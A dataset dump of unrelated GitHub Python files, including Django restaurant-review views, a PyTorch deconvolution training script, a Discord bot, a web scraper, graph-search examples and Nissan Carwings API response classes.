Restaurants\n\n\n# Create your views here.\n\n# Function to handle the search functionality\ndef search_venues(request):\n\n # If the search button is pressed\n if request.method == \"POST\":\n\n # Get the search value and filter the restaurants database based on the search\n searched = request.POST['searched']\n venues = Restaurant.objects.filter(name__contains=searched)\n\n # Return the results page and pass through the data\n return render(request, \"main/results.html\", {'searched': searched, 'venues': venues})\n else:\n return render(request, \"main/results.html\", {})\n\n\n# Function to return the home page\ndef home(response):\n return render(response, \"main/home.html\", {})\n\n\n# Function to handle the registration page\ndef signup(response):\n\n # If the submit button on the registration form is pressed\n if response.method == 'POST':\n form = RegisterForm(response.POST)\n\n # Store the forms data and save it to the database\n if form.is_valid():\n form.save()\n # Route to the users table\n return redirect('/users')\n else:\n form = RegisterForm()\n\n return render(response, \"registration/signup.html\", {\"form\": form})\n\n\n# Function to display the users table\ndef users(response):\n return render(response, \"main/users.html\", {\"users\": User.objects.all()})\n\n\n# Ensure the user must be logged in to leave a review\n@login_required\ndef leaveReview(request):\n\n # Get the restaurant list and convert to a list\n restaurant_list = list(Restaurant.objects.all())\n options = [r for r in restaurant_list]\n\n # If the submit button is pressed\n if request.method == 'POST':\n\n # Get the data from the form\n rest = request.POST.get('review-restaurant', 'ERROR')\n rating = request.POST.get('review-rating', 'ERROR')\n text = request.POST.get('review-text', 'ERROR')\n created_by = request.user\n\n # Get the restaurant\n rest = Restaurant.objects.filter(name__contains=rest)[0]\n\n # Create, store, and save the values for a new review\n r = Review()\n r.restaurant = rest\n r.created_by = created_by\n r.rating = rating\n r.text = text\n r.save()\n\n # Update restaurant rating average\n reviews = Review.objects.filter(restaurant__name__exact=rest.name)\n average = reviews.aggregate(Avg('rating'))\n rest.rating = round(average['rating__avg'], 2)\n rest.save()\n\n # Route to the leave a review page again\n return render(request, \"main/leaveReview.html\", {\"options\": options})\n\n\n# Function to handle explore Reviews page\ndef readReview(response):\n\n # Get the restaurant list with names and ids\n restaurant_list = list(Restaurant.objects.all())\n options = [r.name for r in restaurant_list]\n rest_id = [l.id for l in restaurant_list]\n\n # If the submit button is pressed\n if response.method == 'POST':\n\n # Save and pass through the search and filtered reviews\n searched = response.POST.get('review_search', 'ERROR')\n filtered = Review.objects.filter(restaurant__name__contains=searched)\n return render(response, \"main/readReview.html\", {\"options\": options, \"reviews\": filtered})\n\n else:\n return render(response, \"main/readReview.html\", {\"options\": options})\n\n\n# Function to handle the add a restaurant form\ndef restaurants(response):\n\n # If the submit button was pressed\n if response.method == 'POST':\n form = Restaurants(response.POST)\n\n # If the form is valid\n if form.is_valid():\n\n # Create a new restaurant, populate the fields, and save it to the database\n r = Restaurant()\n r.name = form.cleaned_data[\"name\"]\n r.address = form.cleaned_data[\"address\"]\n r.rating = form.cleaned_data[\"rating\"]\n r.food_type = form.cleaned_data[\"review\"]\n r.save()\n\n # Redirect to the restaurants table\n return redirect('/view_restaurants/')\n\n else:\n form = Restaurants()\n return render(response, \"main/restaurants.html\", {\"form\": form})\n\n\n# Function to display the restaurants table\ndef view_restaurants(response):\n return render(response, \"main/view_restaurants.html\", {\"restaurants\": Restaurant.objects.all()})\n\n\n\n\n","repo_name":"caxton-m/RateMyCampus-1","sub_path":"main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4589,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"9045654330","text":"import argparse\n\nimport numpy as np\nimport torch\nimport torch.utils.data as data_utils\n\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nsns.set()\nimport corner\n\nfrom deconv.gmm.sgd_deconv_gmm import SGDDeconvGMM\nfrom deconv.gmm.data import DeconvDataset\nfrom deconv.flow.svi import SVIFlow\nfrom deconv.flow.svi_gmm import SVIGMMFlow, SVIGMMExact\nfrom deconv.utils.data_gen import generate_mixture_data\n\nparser = argparse.ArgumentParser(description='Train SVI model on toy GMM.')\n\nparser.add_argument('-g', '--gmm', action='store_true')\nparser.add_argument('-s', '--svi-gmm', action='store_true')\nparser.add_argument('-x', '--svi-exact_gmm', action='store_true')\nparser.add_argument('-f', '--freeze_gmm', action='store_true')\nparser.add_argument('-k', '--samples', type=int)\nparser.add_argument('-e', '--epochs', type=int)\nparser.add_argument('-l', '--learning-rate', type=float)\nparser.add_argument('-i', '--use-iwae', action='store_true')\nparser.add_argument('-c', '--grad_clip_norm', type=float)\nparser.add_argument('-m', '--hidden-features', type=int)\nparser.add_argument('output_prefix')\n\nargs = parser.parse_args()\n\nK = 3\nD = 2\nN = 50000\nN_val = int(0.25 * N)\n\nref_gmm, S, (z_train, x_train), (z_val, x_val), _ = generate_mixture_data()\n\nif args.gmm:\n if args.svi_gmm:\n train_data = DeconvDataset(x_train.squeeze(), torch.cholesky(S.repeat(N, 1, 1)))\n val_data = DeconvDataset(x_val.squeeze(), torch.cholesky(S.repeat(N_val, 1, 1)))\n if args.svi_exact_gmm:\n svi_gmm = SVIGMMExact(\n 2,\n 5,\n device=torch.device('cuda'),\n batch_size=512,\n epochs=args.epochs,\n lr=args.learning_rate,\n n_samples=args.samples,\n use_iwae=args.use_iwae,\n context_size=64,\n hidden_features=args.hidden_features\n )\n else:\n svi_gmm = SVIGMMFlow(\n 2,\n 5,\n device=torch.device('cuda'),\n batch_size=512,\n epochs=args.epochs,\n lr=args.learning_rate,\n n_samples=args.samples,\n use_iwae=args.use_iwae,\n context_size=64,\n hidden_features=args.hidden_features\n )\n if args.freeze_gmm:\n svi_gmm.model._prior.load_state_dict(ref_gmm.module.state_dict())\n for param in svi_gmm.model._prior.parameters():\n param.requires_grad = False\n\n svi_gmm.fit(train_data, val_data=val_data)\n torch.save(svi_gmm.model.state_dict(), args.output_prefix + '_params.pt')\n else:\n train_data = DeconvDataset(x_train.squeeze(), S.repeat(N, 1, 1))\n val_data = DeconvDataset(x_val.squeeze(), S.repeat(N_val, 1, 1))\n gmm = SGDDeconvGMM(\n K,\n D,\n batch_size=200,\n epochs=args.epochs,\n lr=args.learning_rate,\n device=torch.device('cuda')\n )\n gmm.fit(train_data, val_data=val_data, verbose=True)\n torch.save(gmm.module.state_dict(), args.output_prefix + '_params.pt')\nelse:\n train_data = DeconvDataset(x_train.squeeze(), torch.cholesky(S.repeat(N, 1, 1)))\n val_data = DeconvDataset(x_val.squeeze(), torch.cholesky(S.repeat(N_val, 1, 1)))\n svi = SVIFlow(\n 2,\n 5,\n device=torch.device('cuda'),\n batch_size=512,\n epochs=args.epochs,\n lr=args.learning_rate,\n n_samples=args.samples,\n use_iwae=args.use_iwae,\n grad_clip_norm=args.grad_clip_norm,\n context_size=64,\n hidden_features=args.hidden_features\n )\n svi.fit(train_data, val_data=val_data)\n\n torch.save(svi.model.state_dict(), args.output_prefix + '_params.pt')\n","repo_name":"bayesiains/density-deconvolution","sub_path":"experiments/flows/mixture_compare.py","file_name":"mixture_compare.py","file_ext":"py","file_size_in_byte":3831,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"81"} +{"seq_id":"70020988106","text":"import MySQLdb\nimport json\nfrom flask import Flask\nimport os\napp = Flask(__name__)\n\n\n# query = \"select pid, pname, r_score from products order by r_score DESC\"\nsearchValue = \"Mivi\"\n# sql_ = (\"select pid, pname, r_score from products where instr(pname, '%s') > 0;\" % (searchValue))\nq = (\"select * from products left join links on products.pid=links.pid where instr(pname, '%s') > 0\" % (searchValue))\n# link = 'data/search.json'\n# sql = (\"select * from %s limit %s, %s;\" % (table, low, size))\n\n\ndef get_rankings(sql, file_link):\n db = MySQLdb.connect(host=\"localhost\", user=\"root\", passwd=\"\", db=\"scoutlab\")\n cur = db.cursor(MySQLdb.cursors.DictCursor)\n cur.execute(sql)\n data = cur.fetchall()\n with app.app_context():\n res = dict(zip(tuple(range(0, len(data))), data))\n print(res)\n open(file_link, 'w').close()\n with open(file_link, 'w', encoding='utf-8') as f:\n while os.stat(file_link).st_size != 0:\n print(\"Error: file is not empty!\")\n open(file_link, 'w').close()\n json.dump(res, f, ensure_ascii=False, indent=4)\n\n cur.close()\n db.close()\n\n\nget_rankings(q, \"data/search.json\")\n","repo_name":"chandanXP/scoutlab","sub_path":"temp.py","file_name":"temp.py","file_ext":"py","file_size_in_byte":1158,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"22516579927","text":"class Solution(object):\n def merge(self, intervals):\n intervals.sort(key=lambda a: a[0])\n\n res, currentInterval = [], intervals[0]\n\n for i in range(1, len(intervals)):\n if currentInterval[1] < intervals[i][0]:\n res.append(currentInterval)\n currentInterval = intervals[i]\n else:\n currentInterval = [min(currentInterval[0], intervals[i][0]), max(currentInterval[1], intervals[i][1])]\n\n res.append(currentInterval)\n return res\n\nanswer = Solution()\nprint(answer.merge([[1,3],[2,6],[8,10],[15,18]]))\nprint(answer.merge([[1,3]]))\n","repo_name":"abedmohammed/leetcode","sub_path":"56MergeIntervals.py","file_name":"56MergeIntervals.py","file_ext":"py","file_size_in_byte":629,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"37095476179","text":"'''\n A\n / \\\n B C\n / \\ \\\nD E F\n \\\n G\n'''\n#In python we use dictionary to describe a graph in Adjacency List format. \n#We need not repeat a vertex again and again but for the heck of it I have.\nGraph = {\n \"A\":[\"B\",\"C\"],\n \"B\":[\"A\",\"D\",\"E\"],\n \"C\":[\"A\",\"F\"],\n \"D\":[\"B\"],\n \"E\":[\"B\",\"G\"],\n \"F\":[\"C\"],\n \"G\":[\"E\"]\n}\ndef BFS(Graph,start):\n visited = []\n queue = []\n visited.append(start)\n queue.append(start)\n while queue:\n v = queue.pop(0) #queue follows First in First out\n print(v,end = \" \")\n for neighbour in Graph[v]:\n if neighbour not in visited:\n visited.append(neighbour)\n queue.append(neighbour)\ndef DFS(Graph,start):\n visited = []\n stack = []\n visited.append(start)\n stack.append(start)\n while stack:\n v = stack.pop(-1) #Stack follows First In Last Out\n print(v,end = \" \")\n for neighbour in Graph[v]:\n if neighbour not in visited:\n visited.append(neighbour)\n stack.append(neighbour)\n\nBFS(Graph,\"A\")\nprint()\nDFS(Graph,\"A\")\n\n\n\n\n ","repo_name":"SohamSinghal/DataStructures","sub_path":"Graph/BFS_and_DFS.py","file_name":"BFS_and_DFS.py","file_ext":"py","file_size_in_byte":1128,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"23392605332","text":"import os\nimport json\n\nimport discord\nfrom discord.ext import commands\nfrom discord_slash import SlashCommand, SlashContext\nfrom discord_slash.utils.manage_commands import create_option\nfrom discord_slash.model import SlashCommandOptionType\n\nfrom adalotl import Adalotl\n\nfrom dotenv import load_dotenv\nload_dotenv()\nDISCORD_TOKEN = os.getenv('DISCORD_TOKEN')\n\nbot = commands.Bot(command_prefix=\"!\", intents=discord.Intents.default())\nslash = SlashCommand(bot, sync_commands=True)\n\nadalotl_command_options = create_option(\n name = \"number\",\n description = \"This is the the Adalotl number, for example, for Adalotl 007, this will be '007'\",\n option_type = SlashCommandOptionType.INTEGER,\n required = True\n )\n\n@slash.slash(name=\"adalotl\", options=[adalotl_command_options])\nasync def _adalotl(ctx: SlashContext, number):\n await ctx.defer()\n\n if (number < 1 or number > 888):\n await ctx.send('Hey!, that adalotl does not exist! :<')\n return\n\n number = f\"{number:03}\"\n\n adalotl = None\n try:\n adalotl = Adalotl(number)\n except TypeError as e:\n await ctx.send('Adalotl not found or not minted yet')\n return\n\n embed_image = discord.Embed(title=f\"Adalotl {number}\")\n embed_image.set_image(url=adalotl.image_url)\n\n embed_attributes = discord.Embed(title='Attributes')\n for attribute in adalotl.attributes:\n embed_attributes.add_field(\n name='\\u200b',\n value=f\"```{attribute}```\",\n inline=True\n )\n\n embed_attributes.add_field(\n name='\\u200b',\n value=f\"```{adalotl.morph}```\",\n inline=True\n )\n\n await ctx.send(embeds=[embed_image, embed_attributes])\n\nbot.run(DISCORD_TOKEN)\n","repo_name":"joecabezas/adalotls-discord-bot","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":1779,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"2805489258","text":"import json\r\nfrom jinja2 import Environment, FileSystemLoader\r\n\r\nwith open (\"restaurants.json\", \"r\") as d:\r\n restaurants=json.load(d)\r\n\r\n fileLoader = FileSystemLoader(\"templates\")\r\n env = Environment(loader=fileLoader)\r\n\r\n rendered = env.get_template(\"dynamic_abrilq.html\").render(restaurants = restaurants)\r\n\r\n fileName = \"index.html\"\r\n\r\n with open(f\"./site/{fileName}\", \"w\") as f:\r\n f.write(rendered)\r\n\r\n\r\n","repo_name":"abrilquinterog/dynamic-html-jinja","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":434,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"16755253689","text":"import requests\n\nfrom bs4 import BeautifulSoup\n\nfrom scrap import ScraperBot\n\nimport csv\n\n\n\n\ndef ChristiesItems(Make=None,Model=None):\n if Make and Model is not None:\n print(\"[+] Success! Scrap Bot Starting!\")\n SearchUrl = \"https://www.christies.com/lotfinder/searchresults.aspx?sc_lang=en&lid=1&action=search&searchfrom=header&entry=\"+Make+\"%20\"+Model\n SoldLotsUrl = SearchUrl+\"&searchtype=p&pg=all\"\n page = requests.get(SoldLotsUrl)\n data = page.content\n htmldata = BeautifulSoup(data, \"html.parser\")\n file = open(Make+Model+'.csv', 'w', newline ='')\n count = 0\n with file:\n header = ['Month','Day','Year','Value','PublicationYear','Make','Model','Source','Link']\n writer = csv.DictWriter(file, fieldnames = header) \n writer.writeheader() \n for ul in htmldata.find_all('div',{\"class\":\"gridView\"}):\n for li in ul.find_all('div',{\"class\":\"image-overlay-box\"}):\n anchor = li.find('a')\n scrap_url = anchor.get('href')\n status = ScraperBot(Url=scrap_url,Make=Make,Model=Model,writer=writer)\n if status == False:\n count = count + 1\n print(\"Make and Model Non stop not matched in string count =\",count)\n if count == 10:\n print(\"Make and Model Non stop not matched limit reached to 10 Quit scraper\")\n break\n if status == True:\n count = 0\n print(\"[+] Christies data Scrap Done check csv file in current directory......>>>>>>>\")\n else:\n raise Exception(\"=====>Make and Model not should be None<=====\")","repo_name":"pythexcel/ChristieScraper","sub_path":"orders.py","file_name":"orders.py","file_ext":"py","file_size_in_byte":1780,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"738084382","text":"from typing import Union, Callable\nimport torch.nn.functional as F\nfrom torch import nn, Tensor\nfrom torch.nn import GELU\n\n\nclass PositionwiseFeedForward(nn.Module):\n \"Implements FFN equation.\"\n\n def __init__(self, d_model, d_ff, dropout=0.1, dtype=None, device =None):\n super(PositionwiseFeedForward, self).__init__()\n self.w_1 = nn.Linear(d_model, d_ff, dtype=dtype, device=device)\n self.w_2 = nn.Linear(d_ff, d_model, dtype=dtype, device=device)\n self.dropout = nn.Dropout(dropout)\n self.activation = GELU()\n\n def forward(self, x):\n return self.w_2(self.dropout(self.activation(self.w_1(x))))\n\n\nclass ActionTransformerEncoderBlock(nn.Module):\n def __init__(self, slots_dim: int, nhead: int, action_dim: int, dim_feedforward_coef: int = 4, reverse_cross_attention=False,\n norm_first=True, dropout: float = 0.1, layer_norm_eps: float = 1e-5, batch_first: bool = False,\n device=None, dtype=None):\n super().__init__()\n self.slots_dim = slots_dim\n self.nhead = nhead\n self.dim_feedforward_coef = dim_feedforward_coef\n self.norm_first = norm_first\n self.reverse_cross_attention = reverse_cross_attention\n\n self.norm_slots = nn.LayerNorm(slots_dim, eps=layer_norm_eps)\n self.norm_action = nn.LayerNorm(action_dim, eps=layer_norm_eps)\n\n self.attention = nn.MultiheadAttention(num_heads=nhead,\n embed_dim=action_dim if reverse_cross_attention else slots_dim,\n dropout=dropout,\n dtype=dtype,\n batch_first=batch_first,\n device=device,\n kdim=slots_dim if reverse_cross_attention else action_dim,\n vdim=slots_dim if reverse_cross_attention else action_dim)\n\n query_dim = action_dim if reverse_cross_attention else slots_dim\n self.dim_feedforward = dim_feedforward_coef * query_dim\n\n self.ffd = PositionwiseFeedForward(d_model=slots_dim,\n d_ff=self.dim_feedforward ,\n dtype=dtype,\n device=device)\n\n def forward(self, slots, action):\n slots = self.norm_slots(slots)\n action = self.norm_action(action)\n q, k, v = (action, slots, slots) if self.reverse_cross_attention else (slots, action, action)\n atten = self.attention(q, k, v)\n out = self.ffd(atten)\n return out\n\n\nclass ActionTransformerEncoder(nn.Module):\n def __init__(self, num_layers, num_heads, slots_dim, action_dim, dim_ffd_coef=4, norm_first=True,\n dropout: float = 0.1, layer_norm_eps: float = 1e-5, batch_first: bool = False,\n device=None, dtype=None):\n super().__init__()\n self.num_layers = num_layers\n self.num_heads = num_heads\n self.slots_dim = slots_dim\n self.action_dim = action_dim\n self.ddm_ffd_coef = dim_ffd_coef\n self.dropout = dropout\n self.layer_norm_eps = layer_norm_eps\n self.norm_first = norm_first\n self.batch_first = batch_first\n self.norm = nn.LayerNorm(slots_dim, eps=layer_norm_eps)\n\n self.layers = self._build_layers(device, dtype)\n def _build_layers(self, device=None, dtype=None):\n # if self.num_layers < 3:\n # raise ValueError(\"Should be at least\")\n layers = nn.ModuleList()\n for k in range(self.num_layers):\n if k == self.num_layers - 1:\n layers.append(ActionTransformerEncoderBlock(\n slots_dim=self.slots_dim,\n nhead=self.num_heads,\n action_dim=self.action_dim,\n dim_feedforward_coef=self.ddm_ffd_coef,\n norm_first=self.norm_first,\n dtype=dtype,\n device=device,\n ))\n continue\n\n layers.append(nn.TransformerEncoderLayer(\n d_model=self.slots_dim,\n nhead=self.num_heads,\n dim_feedforward=self.slots_dim * self.ddm_ffd_coef,\n dropout=self.dropout,\n norm_first=self.norm_first,\n batch_first=self.batch_first,\n device=device,\n dtype=dtype\n ))\n\n return layers\n\n def forward(self, slots, actions):\n for idx, layer in enumerate(self.layers):\n if idx == len(self.num_layers - 1):\n return self.layers(slots, actions)\n slots = self.layers(slots)\n\n\n\n\n\n","repo_name":"v3code/slotformer-atari","sub_path":"slotformer/video_prediction/models/action_transformer.py","file_name":"action_transformer.py","file_ext":"py","file_size_in_byte":4818,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"18699109385","text":"import os\r\nfrom setuptools import setup\r\nimport os.path\r\nimport beyonic\r\n\r\n\r\ndef read(*rnames):\r\n return open(os.path.join(os.path.dirname(__file__), *rnames)).read()\r\n\r\n\r\nVERSION = beyonic.__version__\r\n\r\nfrom os import path\r\nfrom io import open\r\nthis_directory = path.abspath(path.dirname(__file__))\r\nwith open(path.join(this_directory, 'README.md'), encoding='utf-8') as f:\r\n long_description = f.read()\r\n\r\nsetup(\r\n name=\"beyonic\",\r\n version=VERSION,\r\n description=\"The official Python client for the MfsAfrica.com API\",\r\n author=\"Beyonic\",\r\n author_email=\"info@mfsafrica.com\",\r\n long_description=long_description,\r\n long_description_content_type='text/markdown',\r\n packages=[\"beyonic\", \"beyonic.apis\"],\r\n install_requires=[\"requests\"],\r\n license=\"MIT\",\r\n keywords=[\"api\", \"mobile payments\", \"mobile money\", \"beyonic\", \"mpesa\"],\r\n url=\"https://mfsafrica.com\",\r\n classifiers=[\r\n \"Development Status :: 3 - Alpha\",\r\n \"License :: OSI Approved :: MIT License\",\r\n \"Operating System :: OS Independent\",\r\n \"Programming Language :: Python\",\r\n \"Programming Language :: Python :: 3\",\r\n \"Programming Language :: Python :: 3.5\",\r\n \"Programming Language :: Python :: 3.6\",\r\n \"Programming Language :: Python :: Implementation :: PyPy\",\r\n \"Topic :: Software Development :: Libraries :: Python Modules\",\r\n ],\r\n)\r\n","repo_name":"beyonic/beyonic-python","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1410,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"81"} +{"seq_id":"21530054800","text":"import logging\nfrom datetime import timedelta, datetime\nimport pycarwings2\n\nlog = logging.getLogger(__name__)\n\n\ndef _time_remaining(t):\n minutes = float(0)\n if t:\n if (\"hours\" in t) and t[\"hours\"]:\n minutes = 60 * float(t[\"hours\"])\n elif (\"HourRequiredToFull\" in t) and t[\"HourRequiredToFull\"]:\n minutes = 60 * float(t[\"HourRequiredToFull\"])\n if (\"minutes\" in t) and t[\"minutes\"]:\n minutes += float(t[\"minutes\"])\n elif (\"MinutesRequiredToFull\" in t) and t[\"MinutesRequiredToFull\"]:\n minutes += float(t[\"MinutesRequiredToFull\"])\n\n return minutes\n\n\nclass CarwingsResponse:\n def __init__(self, response):\n op_result = None\n if (\"operationResult\" in response):\n op_result = response[\"operationResult\"]\n elif (\"OperationResult\" in response):\n op_result = response[\"OperationResult\"]\n\n # seems to indicate that the vehicle cannot be reached\n if (\"ELECTRIC_WAVE_ABNORMAL\" == op_result):\n log.error(\"could not establish communications with vehicle\")\n raise pycarwings2.CarwingsError(\"could not establish communications with vehicle\")\n\n def _set_cruising_ranges(self, status, off_key=\"cruisingRangeAcOff\", on_key=\"cruisingRangeAcOn\"):\n if off_key in status:\n self.cruising_range_ac_off_km = float(status[off_key]) / 1000\n if on_key in status:\n self.cruising_range_ac_on_km = float(status[on_key]) / 1000\n\n def _set_timestamp(self, status):\n self.timestamp = datetime.strptime(status[\"timeStamp\"], \"%Y-%m-%d %H:%M:%S\") # \"2016-01-02 17:17:38\"\n\n\nclass CarwingsInitialAppResponse(CarwingsResponse):\n def __init__(self, response):\n CarwingsResponse.__init__(self, response)\n self.baseprm = response[\"baseprm\"]\n\n\nclass CarwingsLoginResponse(CarwingsResponse):\n \"\"\"\n example JSON response to login:\n {\n \"status\":200,\n \"message\":\"success\",\n \"sessionId\":\"12345678-1234-1234-1234-1234567890\",\n \"VehicleInfoList\": {\n \"VehicleInfo\": [\n {\n \"charger20066\":\"false\",\n \"nickname\":\"LEAF\",\n \"telematicsEnabled\":\"true\",\n \"vin\":\"1ABCDEFG2HIJKLM3N\"\n }\n ],\n \"vehicleInfo\": [\n {\n \"charger20066\":\"false\",\n \"nickname\":\"LEAF\",\n \"telematicsEnabled\":\"true\",\n \"vin\":\"1ABCDEFG2HIJKLM3N\"\n }\n ]\n },\n \"vehicle\": {\n \"profile\": {\n \"vin\":\"1ABCDEFG2HIJKLM3N\",\n \"gdcUserId\":\"FG12345678\",\n \"gdcPassword\":\"password\",\n \"encAuthToken\":\"ABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ\",\n \"dcmId\":\"123456789012\",\n \"nickname\":\"Alpha124\",\n \"status\":\"ACCEPTED\",\n \"statusDate\": \"Aug 15, 2015 07:00 PM\"\n }\n },\n \"EncAuthToken\":\"ABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ\",\n \"CustomerInfo\": {\n \"UserId\":\"AB12345678\",\n \"Language\":\"en-US\",\n \"Timezone\":\"America/New_York\",\n \"RegionCode\":\"NNA\",\n \"OwnerId\":\"1234567890\",\n \"Nickname\":\"Bravo456\",\n \"Country\":\"US\",\n \"VehicleImage\":\"/content/language/default/images/img/ph_car.jpg\",\n \"UserVehicleBoundDurationSec\":\"999971200\",\n \"VehicleInfo\": {\n \"VIN\":\"1ABCDEFG2HIJKLM3N\",\n \"DCMID\":\"201212345678\",\n \"SIMID\":\"12345678901234567890\",\n \"NAVIID\":\"1234567890\",\n \"EncryptedNAVIID\":\"1234567890ABCDEFGHIJKLMNOP\",\n \"MSN\":\"123456789012345\",\n \"LastVehicleLoginTime\":\"\",\n \"UserVehicleBoundTime\":\"2015-08-17T14:16:32Z\",\n \"LastDCMUseTime\":\"\"\n }\n },\n \"UserInfoRevisionNo\":\"1\"\n }\n \"\"\"\n def __init__(self, response):\n CarwingsResponse.__init__(self, response)\n\n profile = response[\"vehicle\"][\"profile\"]\n self.gdc_user_id = profile[\"gdcUserId\"]\n self.dcm_id = profile[\"dcmId\"]\n self.vin = profile[\"vin\"]\n\n # vehicleInfo block may be top level, or contained in a VehicleInfoList object;\n # why it's sometimes one way and sometimes another is not clear.\n if \"VehicleInfoList\" in response:\n self.nickname = response[\"VehicleInfoList\"][\"vehicleInfo\"][0][\"nickname\"]\n self.custom_sessionid = response[\"VehicleInfoList\"][\"vehicleInfo\"][0][\"custom_sessionid\"]\n elif \"vehicleInfo\" in response:\n self.nickname = response[\"vehicleInfo\"][0][\"nickname\"]\n self.custom_sessionid = response[\"vehicleInfo\"][0][\"custom_sessionid\"]\n\n customer_info = response[\"CustomerInfo\"]\n self.tz = customer_info[\"Timezone\"]\n self.language = customer_info[\"Language\"]\n self.user_vehicle_bound_time = customer_info[\"VehicleInfo\"][\"UserVehicleBoundTime\"]\n\n self.leafs = [{\n \"vin\": self.vin,\n \"nickname\": self.nickname,\n \"bound_time\": self.user_vehicle_bound_time\n }]\n\n\nclass CarwingsBatteryStatusResponse(CarwingsResponse):\n \"\"\"\n Note that before December 2018 this returned a response. Between Dec-2018 and Aug-2019\n it did not return a response from the Nissan Servers. As of Aug 2019 a response is now\n returned again.\n\n # Original\n {\n \"status\": 200,\n \"message\": \"success\",\n \"responseFlag\": \"1\",\n \"operationResult\": \"START\",\n \"timeStamp\": \"2016-01-02 17:17:38\",\n \"cruisingRangeAcOn\": \"115328.0\",\n \"cruisingRangeAcOff\": \"117024.0\",\n \"currentChargeLevel\": \"0\",\n \"chargeMode\": \"220V\",\n \"pluginState\": \"CONNECTED\",\n \"charging\": \"YES\",\n \"chargeStatus\": \"CT\",\n \"batteryDegradation\": \"10\",\n \"batteryCapacity\": \"12\",\n \"timeRequiredToFull\": {\n \"hours\": \"\",\n \"minutes\": \"\"\n },\n \"timeRequiredToFull200\": {\n \"hours\": \"\",\n \"minutes\": \"\"\n },\n \"timeRequiredToFull200_6kW\": {\n \"hours\": \"\",\n \"minutes\": \"\"\n }\n }\n\n # As at 21/01/2019 for a 30kWh Leaf now seems that\n # BatteryStatusCheckResultRequest.php always returns this\n # regardless of battery status.\n {\n \"status\":200,\n \"responseFlag\":\"0\"\n }\n\n {\n \"status\":200,\n \"message\":\"success\",\n \"responseFlag\":\"1\",\n \"operationResult\":\"START\",\n \"timeStamp\":\"2016-02-14 20:28:45\",\n \"cruisingRangeAcOn\":\"107136.0\",\n \"cruisingRangeAcOff\":\"115776.0\",\n \"currentChargeLevel\":\"0\",\n \"chargeMode\":\"NOT_CHARGING\",\n \"pluginState\":\"QC_CONNECTED\",\n \"charging\":\"YES\",\n \"chargeStatus\":\"CT\",\n \"batteryDegradation\":\"11\",\n \"batteryCapacity\":\"12\",\n \"timeRequiredToFull\":{\n \"hours\":\"\",\n \"minutes\":\"\"\n },\n \"timeRequiredToFull200\":{\n \"hours\":\"\",\n \"minutes\":\"\"\n },\n \"timeRequiredToFull200_6kW\":{\n \"hours\":\"\",\n \"minutes\":\"\"\n }\n }\n\n # As at 22/08/2019 for a 30kWh Leaf now seesm that\n # BatteryStatusCheckResultRequest.php returns data again\n # after polling a number of times.\n {\n \"status\": 200,\n \"responseFlag\": \"1\",\n \"operationResult\": \"START\",\n \"timeStamp\": \"2019-08-22 10:26:51\",\n \"cruisingRangeAcOn\": \"129000.0\",\n \"cruisingRangeAcOff\": \"132000.0\",\n \"currentChargeLevel\": \"0\",\n \"chargeMode\": \"NOT_CHARGING\",\n \"pluginState\": \"NOT_CONNECTED\",\n \"charging\": \"NO\",\n \"chargeStatus\": \"0\",\n \"batteryDegradation\": \"180\",\n \"batteryCapacity\": \"240\",\n \"timeRequiredToFull\": {\n \"hours\": \"11\",\n \"minutes\": \"30\"\n },\n \"timeRequiredToFull200\": {\n \"hours\": \"6\",\n \"minutes\": \"30\"\n },\n \"timeRequiredToFull200_6kW\": {\n \"hours\": \"2\",\n \"minutes\": \"30\"\n }\n }\n\n \"\"\"\n def __init__(self, status):\n CarwingsResponse.__init__(self, status)\n\n self._set_timestamp(status)\n self._set_cruising_ranges(status)\n\n self.answer = status\n\n self.battery_capacity = status[\"batteryCapacity\"]\n self.battery_degradation = status[\"batteryDegradation\"]\n\n self.is_connected = (\"NOT_CONNECTED\" != status[\"pluginState\"]) # fun double negative\n self.plugin_state = status[\"pluginState\"]\n\n self.charging_status = status[\"chargeMode\"]\n\n self.is_charging = (\"YES\" == status[\"charging\"])\n\n self.is_quick_charging = (\"RAPIDLY_CHARGING\" == status[\"chargeMode\"])\n self.is_connected_to_quick_charger = (\"QC_CONNECTED\" == status[\"pluginState\"])\n\n self.time_to_full_trickle = timedelta(minutes=_time_remaining(status[\"timeRequiredToFull\"]))\n self.time_to_full_l2 = timedelta(minutes=_time_remaining(status[\"timeRequiredToFull200\"]))\n self.time_to_full_l2_6kw = timedelta(minutes=_time_remaining(status[\"timeRequiredToFull200_6kW\"]))\n\n # For some leafs the battery_percent is not returned\n self.battery_percent = 100 * float(self.battery_degradation) / 12\n\n\nclass CarwingsLatestClimateControlStatusResponse(CarwingsResponse):\n \"\"\"\n climate control on:\n {\n \"status\":200,\n \"message\":\"success\",\n \"RemoteACRecords\":{\n \"OperationResult\":\"START_BATTERY\",\n \"OperationDateAndTime\":\"Feb 10, 2016 10:22 PM\",\n \"RemoteACOperation\":\"START\",\n \"ACStartStopDateAndTime\":\"Feb 10, 2016 10:23 PM\",\n \"CruisingRangeAcOn\":\"107712.0\",\n \"CruisingRangeAcOff\":\"109344.0\",\n \"ACStartStopURL\":\"\",\n \"PluginState\":\"NOT_CONNECTED\",\n 